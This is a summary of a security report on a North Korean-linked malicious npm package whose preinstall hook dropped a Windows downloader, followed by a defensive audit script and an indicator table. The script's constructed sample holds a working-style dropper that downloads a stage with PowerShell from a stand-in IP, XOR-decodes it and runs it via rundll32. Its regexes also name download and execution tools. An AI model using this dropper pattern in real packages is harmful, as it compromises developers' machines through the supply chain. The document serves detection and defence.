North Korean State Actors Exploit Open Source Supply Chain via Malicious npm Package

2024-07-24 Stacklok

https://stacklok.com/blog/north-korean-state-actors-exploit-open-source-supply-chain-via-malicious-npm-package


Stacklok reports that the npm package next-react-notify, published on 22 July 2024, was a copy of the popular call-bind package with one addition: a preinstall script that ran a downloader on install and then deleted it. On Windows, the downloader wrote execu.bat and yui.ps1, fetched an encrypted second stage from 166.88.61[.]72, XOR-decrypted it, saved the result as soss.dat, and executed it through rundll32. The hosting IP had earlier resolved to cryptocopedia[.]com, infrastructure already tied to North Korean npm activity in previous reporting, and the package was unpublished less than four hours after it appeared. Stacklok assessed with reasonable confidence that this was a continuation of the same North Korean state-aligned open source supply chain campaign, without attributing it to a specific group.
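The install-time behaviour described above is what a package audit should catch before `npm install` ever runs the hook. The Node script below is an added example, not Stacklok's tooling or anything from the package they analysed: it reads a manifest, lists every lifecycle hook, follows `node <file>` references into the package so a one-line preinstall that only launches a dropper is not scored as benign, scores the combined text against indicators modelled on the reported chain (PowerShell stage, download from a raw IP, XOR decoding, rundll32, self-deletion), and defangs any network IOCs it finds. The indicator patterns are our own heuristics; the sample package name, file names, the 192.0.2.10 address (RFC 5737 test range), the XOR key and the script bodies are all constructed for the example.

```javascript
// Added example, not code from Stacklok or from the analysed package:
// audit an npm package for install-time lifecycle scripts and for the
// downloader behaviour described in the report.

// npm runs these automatically during install/uninstall; the reported
// package used a preinstall hook.
const LIFECYCLE_HOOKS = [
  "preinstall", "install", "postinstall",
  "prepare", "preuninstall", "postuninstall",
];

// Our own heuristics, chosen to match the behaviour described above.
const INDICATORS = [
  { re: /\brundll32(\.exe)?\b/i, reason: "rundll32 used to run a dropped file" },
  { re: /\b(powershell|pwsh)(\.exe)?\b|\.ps1\b/i, reason: "PowerShell stage" },
  { re: /\b(curl|wget|Invoke-WebRequest|iwr|WebClient|Start-BitsTransfer)\b/i,
    reason: "download at install time" },
  { re: /https?:\/\/(\d{1,3}\.){3}\d{1,3}\b/, reason: "fetch from a raw IP address" },
  { re: /\b(del|erase|rm|Remove-Item|unlinkSync|rimraf)\b/i,
    reason: "deletes a file (possible self-cleanup)" },
  { re: /-bxor\b|\bxor\b/i, reason: "XOR decoding of a fetched blob" },
];

// Return the reasons for every indicator that matches the text.
function scanText(text) {
  const findings = [];
  for (const { re, reason } of INDICATORS) {
    if (re.test(text)) findings.push(reason);
  }
  return findings;
}

// Defang so the report can be pasted without creating live links.
function defang(s) {
  return s.replace(/\./g, "[.]");
}

// Pull raw IPv4 addresses and URL hosts out of script text, defanged.
function extractNetworkIocs(text) {
  const iocs = new Set();
  for (const m of text.matchAll(/\b(?:\d{1,3}\.){3}\d{1,3}\b/g)) iocs.add(defang(m[0]));
  for (const m of text.matchAll(/https?:\/\/([A-Za-z0-9.-]+)/g)) iocs.add(defang(m[1]));
  return [...iocs];
}

// pkg = { manifest: <package.json text>, files: { relativePath: content } }
function auditPackage(pkg) {
  const manifest = JSON.parse(pkg.manifest);
  const scripts = manifest.scripts || {};
  const hooks = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const command = scripts[hook];
    // Follow `node <file>` into the package contents so the dropper's body
    // is scored together with the hook that launches it.
    let body = command;
    for (const m of command.matchAll(/\bnode\s+([\w./-]+\.c?js)\b/g)) {
      const ref = m[1].replace(/^\.\//, "");
      if (pkg.files && ref in pkg.files) body += "\n" + pkg.files[ref];
    }
    hooks.push({ hook, command, findings: scanText(body), iocs: extractNetworkIocs(body) });
  }
  // Any hook deserves a look; two or more indicators on one hook is a block.
  const worst = Math.max(0, ...hooks.map((h) => h.findings.length));
  const risk = hooks.length === 0 ? "none" : worst >= 2 ? "block" : "review";
  return { name: manifest.name, version: manifest.version, hooks, risk };
}

// Constructed sample modelled on the reported chain: a preinstall hook that
// runs a dropper and deletes it; the dropper fetches a blob, XOR-decodes it
// and loads it with rundll32. Name, files, IP and key are made up.
const SAMPLE_PACKAGE = {
  manifest: JSON.stringify({
    name: "example-notify",
    version: "1.0.3",
    scripts: { preinstall: "node setup.js && del setup.js" },
  }),
  files: {
    "setup.js": `
const { execSync } = require("child_process");
if (process.platform === "win32") {
  execSync('powershell -c "Invoke-WebRequest http://192.0.2.10/stage -OutFile stage.bin; ' +
    '$b=[IO.File]::ReadAllBytes(\\'stage.bin\\'); ' +
    'for($i=0;$i -lt $b.Length;$i++){$b[$i]=$b[$i] -bxor 0x5A}; ' +
    '[IO.File]::WriteAllBytes(\\'stage.dat\\',$b); rundll32 stage.dat,Start"');
}`,
  },
};

console.log(JSON.stringify(auditPackage(SAMPLE_PACKAGE), null, 2));
```

On the sample this reports `risk: "block"` with all six indicators on the preinstall hook and `192[.]0[.]2[.]10` as the only network IOC; a manifest with no hooks scores `none`, and a hook that only runs something like `node-gyp rebuild` scores `review`, which is the right default for native builds. Independently of any scanner, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops lifecycle hooks from running at all, which would have prevented this preinstall from executing.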

Indicators of Compromise

Type Value First Seen Last Seen
DOMAIN cryptocopedia.com 2024-07-08 2025-05-16
HASH 43a28fc5a1ee46da0e5698fed473802… 2024-07-24 2024-07-24
HASH b57b75d015526b862ae469b825c7a18… 2024-07-24 2024-07-24
HASH 9d27159f34d4534afaa3f3e8de51c4d… 2024-07-24 2024-07-24
HASH 337c114002a8b25b1ee47546b637391… 2024-07-24 2024-07-24
IPv4 166.88.61.72 2024-07-24 2024-07-24
